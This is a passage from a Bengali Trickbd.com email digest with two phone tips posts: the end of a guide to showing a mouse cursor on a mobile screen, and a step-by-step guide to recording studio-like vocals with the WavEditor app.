উপর ক্লিক করুন তারপর এখান থেকে এটাকে On করে দিন তার পর এরকম একটা আইকন ডিসপ্লে তে চলে আসবে এখন আপনারা হোম বাটনে ক্লিক করে হোম চলে আসুন হুমে আসার পর আইকনটির উপর ক্লিক করুন তারপর এখান থেকে down আইকনের উপর ক্লিক করুন তারপর এখান থেকে Cursor এর উপর ক্লিক করুন তারপর দেখবেন যে কম্পিউটারের মত মাউস চলে আসছে ডিসপ্লেতে আশা করি আপনাদের কে বুঝাইতে পারছি যদি পোস্ট টি আপনাদের কাছে ভাল লাগে তাহলে অবশ্যই পোস্টটিতে একটি লাইক দিবেন এবং কমেন্ট করে আপনার মতামত জানাবেন ধন্যবাদ সবাইকে পুরো পোস্টটি পড়ার জন্য সবাই ভালো থাকবেন সুস্থ থাকবেন ট্রিকবিডির সাথেই থাকবেন The post এখন থেকে আপনার মোবাইলে কম্পিউটারের মত মাউস ব্যবহার করুন কোন অ্যাপ ছাড়া appeared first on Trickbd.com. |
এখন থেকে মোবাইলে রেকর্ড করুন স্টুডিওর মত কন্ঠ আগের তুলনায় অনেক সুন্দর হবে Posted: 09 Jul 2021 09:20 PM PDT আসসালামু আলাইকুমবন্ধুরা সবাই কেমন আছেন। আশা করি সবাই অনেক ভাল আছেন। কারণ ট্রিকবিডি সাথে থাকলে সবাই ভালই থাকে। আর আপনাদের দোয়ায় আমি অনেক ভালো আছি আজকে পনাদেরকে দেখাবো কিভাবে একদম স্টুডিওর মতো আপনার মোবাইল দিয়ে রেকর্ড করবেন তো অনেকে আছেন যারা গান গাইতে ভালোবাসেন কিন্তু রেকর্ড কোয়ালিটি ভালো নাহলে ভালো কন্ঠ খারাপ দেখায় আজকে যে অ্যাপসটা আপনাদের মাঝে শেয়ার করব অ্যাপস টার নাম হল WavEditor এই অ্যাপসটির মাধ্যমে আপনারা খুব সহজেই আপনার Voice কে সুন্দর এবং আকর্ষণীয় করে তুলতে পারবেন তো বেশি কথা না বলে চলুন সরাসরি মুল পোস্টে চলে যায় চলুন তাহলে শুরু করা যাক:প্রথমে এখানে ক্লিক করে অ্যাপটি ডাউনলোড করুন ডাউনলোড করার পর ইন্সটল করে এ্যাপসটি ওপেন করুন ওপেন করার পর এরকম ইন্টারফেস আসবে দেন এখান থেকে Get Started এ ক্লিক করুন তারপর এখান থেকে Record এর উপর ক্লিক করুন তারপর এখান থেকে Setting আইকনের উপর ক্লিক করুন তারপর ওখান থেকে Post Gain -1 করে দিন তারপর এখান থেকে Record আইকনের উপর ক্লিক করে আপনার ভয়েস রেকর্ড করুন ভয়েস রেকর্ড করার পর এখান থেকে Stop আইকনের উপর ক্লিক করে আপনার Voice Save করে নিবেন তারপর এখানে ফাইল এর নাম দেয়ার পর Keep এর উপর ক্লিক করুন তারপর এখান থেকে আপনি যে Voice টা রেকর্ড করেছেন সেই Voice উপর ক্লিক করুন ক্লিক করার পর এরকম আসবে তারপর এখান থেকে Effects এর উপর ক্লিক করুন তারপর এখান থেকে Delay এর উপর ক্লিক করুন তারপর এরকম আসবে এখান থেকে এরকমভাবে কমিয়ে Save ক্লিক করুন তারপর এখান থেকে আবার Effects এর উপর ক্লিক করুন তারপর এখান থেকে Reverb এর উপর ক্লিক করুন ক্লিক করার পর এরকম আসবে তারপর এখান থেকে এরকম ভাবে কমিয়ে Save এ ক্লিক করবেন তারপর এখান থেকে আবার Effects এর উপর ক্লিক করুন তারপর এখান থেকে Graphic EQ এর উপর ক্লিক করুন তারপর এরকম আসবেন তারপর EQ টা এরকম ভাবে সেট করে Save ক্লিক করবেন এখন আপনার এই Voice টা সেভ করার জন্য File এর উপর ক্লিক করুন তারপর এখান থেকে Export এর উপর ক্লিক করুন তারপর এখান থেকে Full এর উপর ক্লিক করুন তারপর এখানে ক্লিক করে আপনি কোন ফোল্ডারে ফাইলটি সেভ করতে চান সেই ফোল্ডার সিলেক্ট করুন ফোল্ডার সিলেক্ট করার পর এখানে আপনি ফাইলের নাম দিন কি নামে সেভ করতে চান ফাইলের নাম দেয়ার পর এখান থেকে Save As এর উপর ক্লিক করুন তারপর এখানে ক্লিক করে ফাইল ফরম্যাট সিলেক্ট করুন তারপর এখান থেকে mp3 উপর ক্লিক করুন তারপর এখান থেকে Export এর উপর ক্লিক করুন ব্যাস আপনার ফাইলটি সেভ হওয়া শুরু হয়ে যাবে Save হলে আপনি শুনতে পারবেন দেখবেন যে আপনার বউ এর আগের তুলনায় অনেক সুন্দর এবং আকর্ষণীয় হয়ে উঠবে স্টুডিও এর মত আশা করি আপনাদেরকে বুঝাতে পারছি পোস্টটি যদি আপনাদের কাছে ভাল লেগে থাকে তাহলে অবশ্যই পোস্টটিতে একটি লাইক দিবেন এবং কমেন্ট করে আপনার মতামত জানাবেন ধন্যবাদ সবাইকে পুরো পোস্টটি পড়ার জন্য সবাই ভালো থাকবেন সুস্থ থাকবেন ট্রিকবিডির সাথেই থাকবেন The post এখন থেকে মোবাইলে রেকর্ড করুন স্টুডিওর মত কন্ঠ আগের তুলনায় অনেক সুন্দর হবে appeared first on Trickbd.com. |
You are subscribed to email updates from Trickbd.com. To stop receiving these emails, you may unsubscribe now. | Email delivery powered by Google |
Google, 1600 Amphitheatre Parkway, Mountain View, CA 94043, United States |
0 Comments